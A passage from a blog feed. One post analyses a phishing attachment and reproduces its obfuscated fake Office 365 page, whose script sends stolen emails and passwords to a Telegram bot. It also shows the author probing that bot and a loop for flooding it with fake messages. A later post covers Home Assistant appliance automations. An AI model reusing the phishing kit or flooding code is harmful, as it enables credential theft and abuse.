z\\x63GxheU\\065\\x68bW\\125iIGNsYXNzPS\\112p\\132GVu\\x64Gl0eSI+\\x50C\\071kaX\\131+\\103\\152w\\x76Z\\107l2\\120jw\\166Z\\107l2P\\x67\\x6fgICA\\x67\\120C9k\\141XY+C\\151AgICA\\u0038Z\\x47l2IGN\\u0073YXN\\x7aP\\u0053Jw\\u0059\\x57\\144\\x70\\142\\x6dF\\x30aW9u\\u004cXZp\\u005aXc\\x67\\x59W5\\u0070bWF0ZSBoYX\\u004d\\u0074a\\x57\\122l\\142nRpd\\x48\\x6bt\\x59m\\x46ubmVy\\x49HN\\163\\141WR\\154LWl\\x75LW\\u0035le\\110Qi\\x50g\\157gICA\\x67\\u0050GR\\u0070\\144\\u006a4\\x4bC\\u006a\\170k\\141XYg\\141WQ\\u0039ImxvZ2lu\\123\\107VhZG\\x56\\x79\\x49iB\\u006a\\u0062GFzcz\\x30\\u0069\\u0063m93\\111HRp\\x64\\107xlI\\x47\\u00564d\\x4310\\141X\\x52sZSI\\u002b\\x43\\x69AgICA8ZGl\\x32\\x49H\\112\\166b\\107U\\x39\\x49m\\x68l\\131W\\122pb\\x6dci\\u0049GFy\\141WE\\x74bG\\126\\u0032ZW\\u00779\\111\\152\\x45i\\x50kVudG\\x56yI\\x48B\\x68c3N3b3JkP\\103\\x39\\x6baXY+C\\x6aw\\x76ZGl\\062\\u0050\\x67\\x6f\\u0038ZGl2IG\\154kP\\123\\u004a\\154cnJ\\166\\u0063n\\x423IiBzdHlsZT0iY2\\x39s\\142\\063I\\066\\u0049\\x48Jl\\x5aD\\163g\\142W\\x46yZ\\x32luOiAxNXB4\\117yBtYXJnaW4t\\u0062\\x47\\126mdD\\157\\x67M\\u0048B\\064\\117\\x79\\x42t\\x59XJnaW\\064\\164\\x64G\\u0039w\\u004fiAwc\\x48g7\\111G1\\x68\\143md\\x70b\\x691\\x69b3\\u0052\\x30\\1422\\x306\\u0049D\\x42w\\145\\u0044siP\\x6a\\x77vZ\\u0047l2\\120go8Z\\107l2I\\107\\u004esYXN\\x7a\\x50S\\112yb3\\143iPg\\x6fg\\u0049C\\x41gPGR\\160d\\151Bj\\142\\107\\106zc\\u007a\\u0030\\151Zm9yb\\123\\061n\\143m91cC\\u0042\\152\\142\\u0032\\167t\\u0062\\127Q\\x74\\u004d\\152\\u0051i\\u0050\\147ogICAgI\\103A\\147\\u0049\\x44xkaX\\131gY2xhc3\\x4d\\071InB\\x73\\131WNla\\107\\x39sZG\\x56yQ2\\071udGFpbmVy\\111\\x6a4\\113IC\\101gICA\\u0067ICAgI\\103AgP\\x47lucHV0\\u0049\\x47\\x35\\x68\\142WU9In\\x42hc3N3ZCIg\\144H\\x6cw\\132T\\x30\\u0069c\\u0047F\\x7ac3d\\x76\\143mQiI\\107\\u006ckP\\123JpMDEx\\117CIgYXV0b2NvbXB\\u0073ZXRlP\\x53\\u004av\\u005amYi\\x49GNsYXN\\x7aP\\x53\\x4amb3Jt\\114W\\x4evbn\\x52\\171b2wg\\x61\\x57\\x35wd\\x58QgZ\\x58h\\x30L\\127\\154uc\\110V0\\111H\\122leH\\121t\\131m\\071\\u0034I\\107V4dC10\\x5aX\\x680LW\\u004a\\166e\\u0043I\\147cGxhY\\062\\126o\\u0062\\x32xkZ\\u0058I9\\u0049\\u006c\\102\\150c3N\\063b3JkIiByZXF1aXJlZ\\u0043\\x41vPg\\1578L\\x32\\x52pd\\1524K\\u0049\\103AgID\\x77v\\u005a\\107l\\x32P\\x67o8L\\062Rpd\\152\\x34KPGR\\x70\\u0064\\x6a4K\\120GRpdiBjbGFzcz0i\\x63\\1079z\\x61\\x58Rpb2\\u0034\\u0074Yn\\x560\\144G9uc\\x79I+C\\151\\101g\\111CA8Z\\x47l2P\\147ogICA\\x67ICA\\147\\111D\\u0078\\x6ba\\130Y\\147Y2xh\\1433M9In\\u004avd\\171I\\x2b\\103i\\u0041g\\u0049CA\\147I\\103\\u0041gI\\x43AgIDxk\\141XYgY2x\\x68c\\x33M9\\x49m\\x4e\\x76\\x62C1t\\u005aC\\060yNCI+\\u0043iAg\\111C\\101\\x67IC\\101g\\111CA\\x67\\u0049CAgI\\x43A8ZG\\x6c2I\\u0047\\u004es\\x59\\130NzP\\123J0\\u005aXh\\x30LTEzI\\152\\064\\113I\\x43AgICAg\\111CA\\x67I\\u0043A\\147\\111CAgICAg\\111CA\\x38\\x5aG\\1542\\111\\107Ns\\131X\\u004ez\\u0050S\\u004amb\\063\\u004at\\114\\127d\\171b3\\u0056wI\\1524\\113\\111CA\\x67\\x49CAgI\\103A\\x67\\x49CAgICAg\\u0049\\x43AgI\\103\\101g\\111CA\\x67PGEgaW\\u00519\\u0049\\x6d\\154k\\121\\x56\\x39\\121V0RfRm9\\x79\\x5a29\\u0030\\x55\\x47F\\172c\\u0033dvcmQiIHJvb\\107\\u00559\\111\\x6d\\170pb\\155\\x73\\151\\111\\x47\\150yZWY\\071I\\x69\\115\\151Pk\\132\\u0076c\\155dvdH\\122lb\\x69B\\u0074eSBwY\\130Nzd\\x32\\x39yZDw\\166YT4K\\x49C\\x41g\\111CAgI\\x43\\101gI\\103\\u0041\\u0067I\\x43A\\u0067\\u0049\\x43Ag\\111CA8\\u004c\\062R\\x70dj\\x34KP\\x47Rp\\x64\\u0069Bj\\x62GFz\\x63z0i\\132m9ybS\\x31ncm9\\u0031c\\x43I\\x2bCjwvZG\\x6c2PgogICAg\\x49\\x43Ag\\111\\104x\\153a\\130\\u0059\\x67Y2\\170\\150c\\x33M9\\u0049\\u006dZ\\x76cm0tZ3JvdXAi\\x50go\\147ICAg\\111CAg\\u0049CAgICA\\070YSBpZD\\x30iaTE2\\u004ej\\u0067i\\111\\107hyZ\\x57Y9Ii\\x4diPlNpZ24\\x67aW4gd2l\\060aCBhbm90\\141GVyI\\107Fj\\x5929\\u0031bnQ8L2E\\053CiAgICAg\\111C\\101g\\x50C9k\\141XY+PC\\x39ka\\u0058\\131+\\x50\\103\\x39\\u006baXY+PC9ka\\x58Y+Ci\\x41gIC\\1018L2\\x52\\u0070\\u0064\\1524K\\103\\x69\\x41\\x67I\\u0043\\u0041\\x38ZGl\\u0032\\u0049G\\x4es\\131\\x58\\116zPSJ3aW4tYnV0d\\107\\071uL\\x58B\\x70\\x62i1ib3\\x520b20\\151\\u0050g\\157gI\\x43Ag\\u0049CAgIDx\\153a\\u0058Yg\\1312x\\150\\1433M9\\111nJ\\166dyI\\u002bCiAg\\x49\\u0043AgI\\x43AgICA\\x67\\111Dx\\153\\u0061XY+PGRpdiB\\u006a\\142GFzc\\172\\060iY29s\\114X\\x68\\x7a\\u004cT\\x49\\x30\\u0049\\1075vLXB\\x68\\132GR\\u0070bmctb\\x47\\126md\\x431\\171aWdod\\103B\\151\\u0064XR0b\\x324tY2\\071\\x75dG\\u0046p\\x62mVy\\111j4KI\\103A\\147IDx\\153\\141XYgY2x\\150c\\x33M\\x39ImlubG\\154uZ\\1231i\\142G9ja\\u0079I\\053CiA\\u0067IC\\101g\\111\\x43Ag\\120GlucHV\\x30IH\\x525\\u0063GU9\\u0049nN1Ym1pd\\u0043I\\147\\x61W\\1219Im\\x6c\\x6b\\x550\\154C\\144X\\x52\\060\\u0062245I\\x69BjbGFz\\u0063\\x7a0\\x69d\\x32l\\x75\\114WJ1dHRvbiBidXR0b\\u00325\\146cHJpbWF\\u0079\\145S\\u0042\\x69d\\u0058\\1220b\\u0032\\064g\\x5aXh0L\\x57J1dHRv\\x62iBw\\u0063\\x6dltY\\x58J\\x35IG\\1264\\144C1wcm\\154tY\\x58J5I\\151B2\\131Wx1ZT0\\x69U2lnbiBp\\x62iI\\x2b\\103iAgIC\\x418L2\\122\\x70dj4K\\x50\\u00439\\153\\u0061XY+PC9\\153aXY\\x2bC\\151\\x41gI\\103A\\x67\\111CAgPC9k\\141XY+C\\151A\\147\\111CA8\\x4c\\x32Rp\\144j\\064\\113P\\x439kaXY\\053\\x50C9kaXY\\x2bC\\151AgICA\\x38\\x4c2\\x52pdj4KPC9\\153a\\u0058Y+PC9k\\141\\x58\\131+PC\\u0039k\\u0061\\x58Y+PC9ka\\u0058Y+\\x43\\x69Ag\\111CA8L2Rpd\\1524KP\\1039kaXY+\\x50C9\\x6baXY+\\u0043\\151\\x41gICAgIC\\u0041\\u0067\\x50\\u00439k\\141XY+CiAg\\u0049C\\x41\\x38L2Rpdj4KICA\\147\\111\\104\\x78kaXY\\147a\\x57Q9ImZv\\x623Rl\\u0063iIgc\\x6d\\071sZT\\x30\\151\\x5929u\\144\\107VudGluZm8\\x69\\x49\\u0047\\116sYXNz\\120S\\112m\\u00622\\0710Z\\x58IgZXh0\\x4cWZvb3\\122l\\x63iI+Ci\\101gI\\x43\\101\\x67I\\103\\x41gPGRpdj4KPG\\x52\\160\\144\\x69BpZ\\1040iZ\\155\\071vd\\x47VyTGl\\x75\\u00613\\x4di\\111GNsY\\130N\\x7a\\120\\123J\\u006db2\\0710ZX\\x4aOb2R\\154IHR\\u006ceHQtc\\062\\126\\x6ab2\\065\\u006b\\x59X\\112\\u0035Ij4K\\111CA\\147ICAg\\x49CA\\x38YS\\102\\160ZD\\060i\\132nRyV\\u0047VybX\\u004diI\\u0047hyZWY9\\111iMi\\x49G\\u004e\\x73YXNzP\\x53Jm\\14229\\060Z\\130I\\164Y29\\x75\\u0064GVudC\\x42l\\145HQ\\164Z\\1559v\\144G\\x56\\u0079L\\x57Nv\\x62nRlbnQ\\u0067Zm9vdGV\\171LWl0\\x5a\\1270\\x67\\u005a\\x58h\\x30LWZvb3Rlci1pd\\x47V\\u0074Ij5UZXJtc\\171BvZiB1c\\u0032\\125\\x38\\114\\u0032\\105\\053C\\u0069\\x41gICAg\\x49CA\\147P\\x47EgaWQ9ImZ0c\\x6cByaX\\x5ahY3\\u006biIG\\x68yZ\\u0057Y9I\\x69MiIG\\x4e\\x73YXNz\\120SJmb290ZX\\111tY29udGVu\\x64\\103BleHQtZ\\155\\u0039\\x76\\144G\\x56yL\\x57\\x4evb\\u006eR\\u006cbnQgZ\\u006d9\\x76dGVyLWl\\x30ZW\\x30gZXh0LWZvb3Rlc\\x69\\x31p\\x64GVt\\u0049j\\x35Qcml\\062\\x59WN\\x35I\\103ZhbXA7I\\u0047\\x4e\\u0076\\1422tpZX\\u004d8L\\x32E+C\\151A\\x67ICA\\x38\\131SBpZD0i\\142W9yZU9wd\\u0047l\\u0076bn\\u004d\\151I\\x47\\150\\171\\132WY\\071Ii\\x4d\\u0069I\\107FyaWE\\164bGFiZWw\\u0039\\111k\\116\\u0073aWNrIGhl\\x63mU\\x67Zm9yIHRyb\\u0033V\\x69bGVzaG9v\\u0064\\u0047luZyBp\\142mZvcm1\\x68dGlvb\\x69IgY2x\\x68c3\\u004d\\x39Im\\132\\x76b3Rl\\x63i1\\x6ab\\06250Z\\u0057\\0650IGV4\\144C1mb2\\x390ZXItY29udG\\x56udCBm\\x62290\\x5aXItaXRlb\\x53Bl\\145\\110\\121\\164Z\\x6d\\071\\x76\\144\\x47VyLW\\1540Z\\u00570\\147\\x5aGV\\x69dWctaXR\\x6cb\\123B\\u006c\\145HQtZGVidWctaXRlb\\123\\111+Li4u\\x50\\1039\\150\\x50go\\070L2Rp\\x64\\x6a48L\\062\\u0052p\\x64j\\x34K\\111CAgIDw\\x76\\132\\x47l2Pgo8L2\\u0052pd\\x6a48\\1142Rp\\x64\\x6a4\\x38L2\\u0052\\u0070dj4K\\x50C9\\155b\\x33\\x4atPgo\\x38\\x632Ny\\x61X\\x420P\\x67ogICA\\147dm\\x46y\\111\\107\\x4evdW50I\\x440gM\\u0044s\\113ICAgI\\x48ZhciBwc3dkMTsKIC\\101gIG\\122vY3\\x56tZW50\\x4cmdldEVsZ\\u0057\\061lbnRC\\x65UlkKCJp\\x5aF\\x4eJ\\u0051nV0d\\107\\u0039uOSIp\\114mF\\x6bZE\\x56\\x32\\u005aW50\\x54Glzd\\x47VuZXI\\x6fI\\155\\116\\163aWNrIiwgZn\\u0056u\\u00593Rpb\\x324\\u006f\\x5aSk\\147ewogI\\103A\\x67ZS\\u0035\\x77cmV2\\u005aW5\\u0030R\\107Vm\\x59XVsdC\\147p\\x4fwo\\u004bIC\\101gIHZhci\\x42wc\\063dk\\u0049D0\\147\\x5aG9jdW\\061lbnQu\\x5a2\\x56\\u0030\\x52W\\170lb\\u0057\\x56udEJ\\065SWQoJ2k\\x77MTE\\x34\\x4aykudmFsdW\\125\\u0037CiA\\147IC\\x42p\\132i\\101ocH\\x4e3Z\\x43A\\u0039PSBudWx\\163IHx8IHB\\u007a\\u00642Q\\x67PT\\x30gI\\u0069Ipewo\\u0067\\x49CAgICA\\147IGRvY\\063VtZW50Lmd\\154\\x64\\x45Vs\\132\\x571lbnRCe\\u0055lkKCdlcnJ\\166c\\156B\\063\\u004aykuaW5uZ\\x58\\x4a\\x49\\126E\\x31MI\\x440\\147YF\\u006c\\166dXIg\\131W\\x4ejb3\\x56\\165dCBw\\u0059XNz\\14429yZCBjYW\\065\\x75\\x62\\x33QgY\\155\\125gZW1\\x77d\\110kuIGl\\x6dIHlvdSB\\u006bb24n\\u0064CB\\x79\\u005aW1l\\x62WJl\\143iB5b3\\126y\\u0049\\x48Bhc3N3b3JkLC\\x418\\131SBocmVm\\120\\u0053\\111j\\u0049j5y\\x5a\\x58NldC\\x42pdC\\x42\\x75b3cu\\u0050C9hPmA7Ci\\u0041\\u0067\\111CAgIC\\x41\\147c2V0\\126\\107ltZW91\\144CgoKS\\x419\\120iB7ZG9jdW\\061lbnQ\\x75Z2V0RWx\\x6c\\142W\\126u\\x64E\\u004a5SWQoJ2\\x56ycm9ycH\\u0063\\u006eK\\x53\\x35p\\u0062m5\\x6c\\x63\\x6bhUT\\x55wgP\\123AnJzt9LCAzM\\104AwK\\124t\\u0039C\\151AgICBl\\x62\\110NlI\\107l\\x6dK\\x48Bz\\x642QubGVuZ3Ro\\x49\\104wgNS\\u006c\\067\\103iA\\x67ICA\\147\\111\\x43A\\x67\\132\\107\\x39j\\x64\\u00571l\\x62\\x6eQu\\x5a2\\x56\\060RWx\\x6c\\142\\x57\\126udE\\1125S\\127QoJ2V\\171cm9\\u0079cHcnKS\\x35pb\\1555\\x6cc\\u006bh\\125TUwg\\x50S\\101i\\x57W91\\143iBh\\1312N\\x76d\\x57\\x350\\111HB\\u0068c\\x33N3\\u00623J\\x6bIGlzIHRvbyBz\\141\\x479y\\144C4\\u0069Owog\\x49CA\\147IC\\101gIH\\116ldFRpb\\127VvdXQ\\u006fK\\x43\\153gPT4ge\\062RvY\\u0033\\x56t\\132W5\\x30Lm\\x64\\154dE\\x56sZ\\x571\\u006cb\\x6eRCe\\u0055lkKCdlcnJvc\\x6eB\\u0033Jyk\\x75\\x61\\1275uZ\\u0058JIV\\x451MID0gJyc7I\\x47\\u0052\\x76\\x593Vt\\132W50Lmd\\154dE\\u0056sZW\\061\\x6cbn\\122CeU\\x6ckKCJpMDI4M\\x53IpLn\\u004alc2V0KCk\\x37\\x66S\\167gMzAw\\u004dCk7CiAgICB9IGV\\163c2U\\147\\141\\127\\131g\\x4bGNvdW50PD\\x45pewog\\111CA\\147I\\x43\\x41gIHBz\\u0064\\062\\121\\170\\x49D0gZ\\107\\x39jdW1lbnQ\\x75Z2V\\060R\\u0057x\\x6cbWVudEJ5SWQo\\112\\x32kwM\\x54\\x45\\064Jykudm\\x46\\u0073dW\\1257CiAgICAg\\x49\\u0043AgZ\\u0047\\071jd\\x571lbn\\121uZ\\x32\\x560\\122Wxlb\\u0057V\\x75dEJ5SWQ\\x6f\\x4a\\x32Vycm9ycHcn\\u004bS5pbm5lckhUT\\x55wgPS\\x42g\\x57W91c\\151BhY\\x32\\x4e\\166d\\x5750I\\107\\x39\\171\\111\\x48B\\150c\\063N3b3Jk\\111GlzIG\\u006cuY29y\\u0063mV\\u006adC\\x34g\\u0061W\\131geW91\\u0049GRvbid\\x30\\x49\\x48Jlb\\x57VtY\\x6d\\x56\\u0079\\111Hl\\166dXI\\u0067cGFzc3\\144vcmQsIDx\\150IG\\u0068yZWY9Ii\\x4diPn\\u004a\\x6cc2\\u00560I\\107l0IG5v\\144y\\x348L\\x32E+Y\\x44\\163\\x4bICAg\\x49\\x43A\\147\\x49CBkb2N1bWVudC\\x35\\u006eZXRFbGV\\164ZW5\\x30Qn\\u006c\\112ZC\\147iaTAyODEiKS5yZXNldC\\147\\160Oy\\102jb3V\\u0075dCsr\\1173\\x30KICAgIGVsc\\x32Uge\\u0077\\u006f\\u0067ICAgICA\\x67IH\\132\\x68ci\\x42JUC\\101\\x39IGRvY\\x33\\x56tZW50Lmdld\\105V\\u0073\\132W1lbnRCeU\\u006ckKCdn\\x5amc\\x6eKS5\\060Z\\u0058h0Q2\\x39udGV\\165dD\\163KICAg\\u0049CA\\x67IC\\x422YX\\u0049gbWVz\\1432FnZS\\x419IGA\\x39\\u0050T\\0609PT0g\\u0054zM2NS\\x42SZ\\u0058N1bHQgPT09PT0\\u0039\\130\\x48Jc\\x62\\153VtYWls\\u004f\\151Ak\\1452VtYWlsfV\\170yX\\u0047\\x35QYX\\116\\172\\x6429yZ\\x44E6IC\\x527cHN3\\x5a\\u0044F9XH\\u004a\\x63blBhc3N3b3\\112\\u006bMjogJHt\\x77c\\063dk\\u0066V\\u0078\\171X\\x475JUD\\x6f\\147a\\u0048R\\060c\\x48\\x4d\\066L\\x799pc\\1031h\\143G\\x6bu\\13129tL\\x79R\\067SV\\102\\071XHJ\\143b\\x6cVzZ\\u0058\\u0049t\\x51W\\144\\u006cb\\u006eQ\\x36ICR7bmF2a\\127dhd\\1079\\u0079L\\x6e\\x56z\\x5aX\\x4aB\\132\\x32Vud\\u00481\\143\\143l\\x78\\u0075PT09P\\124\\u00309PT0\\u0039\\u0050T09PT09PT\\x30\\x39PWA7\\u0043iAgI\\103\\101gICA\\u0067\\u0064mF\\171\\111HNld\\110\\122pb\\x6ddzID0gew\\x6f\\147IC\\101\\x67ICAg\\x49CAg\\111\\103A\\151\\u0059X\\1165\\142m\\115i\\x4fiB\\060\\x63nVlLCA\\u0069Y\\u0033\\x4av\\u00633N\\x45b\\062\\u0031haW\\x34i\\x4fiB0\\143\\x6eVlLCA\\x69dXJsIj\\x6f\\x67\\111\\155h\\x30\\x64HBz\\x4f\\151\\x38v\\x59XBp\\u004cnRlbGVncmFtL\\u006d9\\x79Zy\\u0039i\\142\\063\\121i\\111\\u0043sgdG\\x39\\162\\132W\\064gK\\x79\\x41\\x69L3Nlb\\x6dRNZ\\x58NzY\\127\\x64lIiwKI\\103\\101g\\111\\x43A\\147IC\\x41g\\111C\\u0041gIm1l\\144GhvZCI6ICJQ\\1241N\\x55\\u0049\\u0069\\x77gI\\x6dhlYW\\122l\\143nMi\\u004fiB7\\x49kN\\x76b\\156\\122lb\\156Q\\164\\x56H\\154\\167\\132\\123I\\066ICJ\\x68cH\\102\\x73aWN\\x68dG\\154\\x76\\142\\x699qc\\u00329uI\\151\\167\\u0067\\u0049mN\\u0068Y2\\u0068lL\\x57NvbnRyb2\\167i\\x4fiAib\\155\\u0038t\\x59\\062\\106jaGU\\x69fS\\x77K\\u0049\\x43\\x41gICA\\147\\111C\\101g\\111CA\\x67\\111\\u006d\\122hd\\x47\\105iOi\\u0042KU09O\\114n\\1160cm\\154u\\1322lme\\123h7\\111mNoYX\\u0052\\u0066a\\x57\\121iO\\151B\\152\\141GF0X2lkLCAidGV\\x34\\x64\\x43I\\066\\111\\1071l\\143\\x33NhZ\\062V9KX\\x30\\u004b\\111\\x43\\u0041gIC\\x41gIC\\x41kLm\\106\\161YX\\147o\\1432\\u00560dG\\x6c\\u0075\\1323\\115p\\u004c\\155R\\x76bm\\x55\\x6f\\113HJlc3Bv\\142nN\\x6cKSA9PiB7d\\u0032luZ\\107\\071\\x33Lm\\u0078\\u0076Y\\u0032\\x46\\x30\\141W9uLn\\x4a\\x6c\\x63Gx\\x68\\x592UoJ\\x32h\\u0030\\x64\\110BzOi\\070v\\x63G9\\x79d\\107FsL\\u006d\\x39m\\x5amljZ\\123\\u0035j\\x622\\x30\\166c2Vy\\x64m\\154jZ\\130N0YXR1cy\\x63p\\1173\\x30pOwo\\u0067IC\\101\\x67fSA\\113I\\103\\x41gIH\\060\\x70O\\x79AKP\\x439zY3Jp\\x63HQ+C\\u006awvZGl\\x32\\120jwvYm9k\\x65T48L\\u0032h0b\\127w+");\\u0064\\u006fc\\u0075m\\u0065\\u006e\\u0074.write(data);</script> What’s interesting is they’ve exploited that you can use unicode escaping for JavaScript identifier names, which is legal as per the spec.\nLet’s take this:\n1 var e\\u006dail="<yes, my email was here>"; We have the unicode codepoint of 006d (the \\u indicates that it’s a unicode escape) and if we refer to a unicode lookup table we’ll see that 006d is m, meaning that we have an identifier of email. Bet you didn’t guess THAT did you!\nClearly, this particular version of the file has gone hard on the unicode identifiers, even down to \\u0064\\u006fc\\u0075m\\u0065\\u006e\\u0074.write, which is just document.write.\nThis brings us to the question of why, why would you convert all the JavaScript, or at least some of it, to unicode? I can only speculate, but I’d assume that they are doing it as a layer of obfuscation, it’s just another thing that makes the code less readable to anyone who goes snooping around in it and make them think that maybe it is legitimate in what it’s doing. It does come at the expense of size, going from 8.6KB to 17.8KB, which is why this isn’t a common form of obfuscation for served JavaScript, but if you’re running an offline file like this, it doesn’t really matter.\nDigging into Telegram In the last post I was saddened by the fact that I couldn’t use the Telegram API with the token that was in the email body as it was no longer authorised. This time though, I’m pleased to say that it is active, at least at the time of writing!\nSo, let’s poke it.\nFrom the JavaScript, we can see that the token is used to call the bot parts of the API, suggesting that it’s a valid bot token and nothing more, but let’s start trying to figure out the user info for the bot. I’m going to do this in JavaScript, for something a bit different, and we’ll start by getting the bot and chat info:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import "dotenv/config"; (async () => { const token = process.env.TELEGRAM_TOKEN || ""; const chat_id = process.env.CHAT_ID || ""; const telegramAPIBase = `https://api.telegram.org/bot${token}`; let res = await fetch(`${telegramAPIBase}/getMe`, { method: "POST" }); let json = await res.json(); console.log("me", json); res = await fetch(`${telegramAPIBase}/getChat`, { method: "POST", body: JSON.stringify({ chat_id }), headers: { "Content-Type": "application/json", "cache-control": "no-cache", }, }); json = await res.json(); console.log("chat", json); })(); This sees the following dumped to the console:\nme { ok: true, result: { id: 5742807394, is_bot: true, first_name: 'countduque', username: 'countduque11_bot', can_join_groups: true, can_read_all_group_messages: false, supports_inline_queries: false } } chat { ok: true, result: { id: 5486255038, first_name: 'Count', last_name: 'Duque', type: 'private' } } So our bot is named countduque and they are in a private chat (which isn’t surprising really), but what is surprising, and somewhat annoying, is that the user has can_read_all_group_messages set to false, which is the default for bots. The impact of this is that the bot is unable to read out the messages of the chat. I had assumed that they were using the bot as the input and output processing, but it seems like it’s just feeding the data in and either they have a person on the other end that reads the messages, or a different bot that reads them. Given the semi-structured nature of the input, I’m guessing they have another bot that’s reading the messages.\nTo validate, I use the getUpdates endpoint, but through all my testing, I was unable to get back any messages, even when I submitted them I was unable to read them back immediately… queue sad face.\nI guess that I’m not going to be able to get much further with this bot… so instead I spammed it with 1000000 fake messages… as you do.\nSummary I’m enjoying this exploration into the spammer emails. It was interesting to see the use of unicode for identifier names as a way to obfuscate the code a little more (at least, so I assume), and I’m not surprised that I wasn’t able to pull the messages from the Telegram chat, just saddened that I couldn’t.\nI’ll just have to keep an eye out for the next one that comes in and see if I can learn any more.\nOh, and I’d totally not encourage anyone to use the token/chat ID that was in this to run code such as this:\n1 2 3 4 5 6 7 8 9 10 11 for (let i = 0; i < 1000000; i++) { const message = `====== O365 Result ======\\\\r\\\\nEmail: ${email}\\\\r\\\\nPassword1: ${password}\\\\r\\\\nPassword2: ${password}\\\\r\\\\nIP: https://ip-api.com/0.0.0.0\\\\r\\\\nUser-Agent: Mozilla/4.02 [en] (X11; I; SunOS 5.6 sun4u)\\\\r\\\\n===================`; fetch(`${telegramAPIBase}/sendMessage`, { method: "POST", body: JSON.stringify({ chat_id: chat_id, text: message }), headers: { "Content-Type": "application/json", "cache-control": "no-cache", }, }); } I really wouldn’t… 😏\n", "id": "2022-08-23-more-phishing-attempts" }, { "title": "Building a Smart Home - Part 3 \"Smart\" Appliances", "url": "https://www.aaron-powell.com/posts/2022-08-18-building-a-smart-home---part-3-smart-appliances/", "date": "Thu, 18 Aug 2022 06:21:32 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "It's time to start automating, and let's start with our appliances", "content": "After exploring a bit of the thought process on the how and why with my journey to a smart home, it’s time to look at a what, and for that I’m going to tackle one of the problems I identified in the last post:\nForgetting the washing machine was done to hang the laundry out\nTo give a bit of context, my home office is upstairs while the laundry is downstairs, and what this means is that I generally don’t hear when the appliances finish their cycle, and if I don’t realise until half way through the day, then it’s likely that our washing isn’t getting dry unless it goes in the dryer (and because we don’t have solar in yet, I try to reduce the amount of time we use that as it’s expensive!). Queue sad Aaron.\nWhile yes, there’s a whole heap of wifi-enabled appliances, we got new ones with the new house and they are not wifi-enabled, so going out and buying a whole new set is not something that’s in the budget.\nSo, how do we tackle this?\nIs this thing on How do we know if an appliance is running? The simplest way to do that is looking at whether it’s using power or not and apply some basic logic of if using power - state:running, if not using power and last state:running - state:finished.\nThis means we’re going to need to figure out whether the appliance is drawing power and to do that we’ll get some smart switches to do power monitoring. There’s a heap of switches on the market, across all protocols from wifi to ZigBee, but since I’m not ready to dive into the world of ZigBee or Z-Wave yet, I went with the TP-Link Kasa KP115 because they were easy to get (I got them from Bunnings, but it seems Bunnings no longer stocks them), they have a very small profile, and they connect to Home Assistant using the TPLink Kasa integration.\nI grabbed myself three of them (washing machine, dryer and dishwasher), and set them up in the Kasa app.\nI did setup a Kasa Cloud account for this but I’ve since learnt that they do support local control, so you might not need to do that, but I haven’t had time (or the motivation) to go back and reconfigure the setup.\nWith the devices on the network it was only a matter of time until Home Assistant picked them up and then they were available as entities for me:\nGreat, time to see what it can do.\nLooking at the data When the device was added to Home Assistant it gave me several new sensors. This is the view of my washing machine (which ran a cycle earlier today):\nFrom an automation standpoint, the Current Consumption is going to be most relevant, as that’s reporting the Watts that is being drawn through the plug. We can get a good view of this over time:\nI reckon we can work with this. So, armed with our insights, let’s make an automation.\nAutomation - take 1 The first automation I created was very simplistic:\n1 2 3 4 5 6 7 8 9 10 11 12 13 alias: Is washing done description: "" mode: single trigger: - platform: state entity_id: - sensor.washing_machine_current_consumption to: "0" condition: [] action: - service: notify.mobile_app_aaron_s_phone data: message: Washing done This automation will run when the washing machine stops drawing power and that seems right doesn’t it? If it’s not drawing power, it’s done, isn’t it?\nWell, the blow up on my phones notifications would suggest otherwise… turns out that this automation works, but doesn’t work quite right. Let’s go back to the graph from before.\nDo you see the problem?\nThe problem is I’m making a false assumption that the power draw is consistent, when in reality, power goes up and down, depending on the phase of the wash cycle, and as a result, we hit the zero power draw trigger with a lot of false positives.\nAutomation - take 2 So it turns out that what I really should be doing is using the for parameter of the trigger and have it say if the power is zero for <some duration> - finished. Because I’m sure this is a solved problem, I decided to search the Home Assistant forms and came across this blueprint, which you can install here:\nIf you’ve not used a blueprint, it’s a pre-configured automation in which you just plug in the relevant values, and this one is designed around appliance finished scenarios. Once the blueprint is imported, you can use it as the base for a new automation:\nThe other thing I like about this blueprint is that it has both start and stop actions that can be configured, so when the appliance crosses the threshold to be considered as started you can do something and then when it’s completed do something else.\nHere’s what the automation now looks like, and if we hit save, it’s good to go (and my phone won’t get spammed!).\nBonus points - tracking state Mainly for fun, but also because I think it might be useful in the future, I decided to expand the actions of the automation to give more rich information about the appliance, specifically, track when the appliance last started, and what its current state is.\nThis will mean I can make my dashboard look like this:\nFor this, I created two inputs, date time and text. Next, in the on start phase of the blueprint, I set the values of those to their relative states, and then when it’s finished, I change the text input from Running to Finished.\nHere’s the complete automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 alias: "Appliance finished: Washing" description: "" use_blueprint: path: >- sbyx/notify-or-do-something-when-an-appliance-like-a-dishwasher-or-washing-machine-finishes.yaml input: power_sensor: sensor.washing_machine_current_consumption actions: - service: notify.mobile_app_aaron_s_phone data: message: Washing finished! title: 🧺 Laundry - service: input_text.set_value data: value: Finished target: entity_id: input_text.washing_machine_enriched_status - if: - condition: time before: "19:00:00" after: "07:00:00" weekday: - mon - tue - wed - thu - fri then: - service: tts.google_translate_say data: entity_id: media_player.whole_house message: Washing finished else: [] pre_actions: - service: input_text.set_value data: value: Running target: entity_id: input_text.washing_machine_enriched_status - service: input_datetime.set_datetime data: datetime: "{{ now().strftime('%Y-%m-%d %H:%M:%S') }}" target: entity_id: input_datetime.washing_machine_last_started Setting the last_started requires a value to be set using a template, which you can only do in YAML, but it just grabs now() and formats it for storage.\nAlso, for fun, I have it announce on all our Google Homes when the washing finishes using the Text To Speech (TTS) service, but that’s wrapped in a condition that only allows it Monday - Friday between 7am and 7pm, so not to wake anyone. Ask me how I knew to add that 😅!\nSummary Here we’ve seen how I turned a dumb appliance into a smart one, and done a small quality of life improvement.\nBy using power monitoring and a simple automation, we can determine when an appliance is running, and by tracking that, work out when it’s finished to give you the feedback needed.\nI’ve actually had this automation running for a few months now (I originally set it up at our rental), and it’s by far the most relied upon one that I have.\nSure, there has been a few hiccups - the Kasa plugs occasionally lose connection to Home Assistant (sometimes they go into ’local only’ mode but I’m not sure what triggers that), but since I put them on fixed IP’s they’ve been better.\nI’ve got some ideas on how to improve the notifications more, like if I’m out, don’t send the notification until I’m home, but that’s well down the priority list. For now, this is doing the job nicely.\n", "id": 